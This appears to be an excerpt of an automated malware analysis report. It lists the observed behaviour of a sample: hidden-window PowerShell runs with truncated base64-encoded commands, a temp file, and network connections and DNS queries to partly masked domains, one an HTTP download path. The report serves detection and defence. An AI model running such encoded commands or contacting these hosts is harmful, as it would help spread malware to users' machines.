Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGIAcQBiAHcAaQBwAHcAcQA9ACcASQBvAGsAZwBkAGEAdgBhACcAOwAkAFQAbgBmAG0AZAByAHUAcwBuAGQAIAA9ACAAJwAxADgANwAnADsAJABXAGEAbQBmAGUAZwBlAGIAcQBjAGMAYwA9ACcASgB6AHYAbQBiAHkAdwBpAGoAeAAnADsAJABZAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1964
- %TEMP%\976004.cvr
- 'ac######on.mathetmots.com':443
- 'tr########orate.volcanicvalley.com':80
- http://tr########orate.volcanicvalley.com/tgrncf/TR5wOl2/
- 'ac######on.mathetmots.com':443
- DNS ASK ac######on.mathetmots.com
- DNS ASK cr#.###universal.com
- DNS ASK tr########orate.volcanicvalley.com
- DNS ASK ho#####.cypshluchim.com
- DNS ASK my###mkat.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGIAcQBiAHcAaQBwAHcAcQA9ACcASQBvAGsAZwBkAGEAdgBhACcAOwAkAFQAbgBmAG0AZAByAHUAcwBuAGQAIAA9ACAAJwAxADgANwAnADsAJABXAGEAbQBmAGUAZwBlAGIAcQBjAGMAYwA9ACcASgB6AHYAbQBiAHkAdwBpAGoAeAAnADsAJABZAH...' (with hidden window)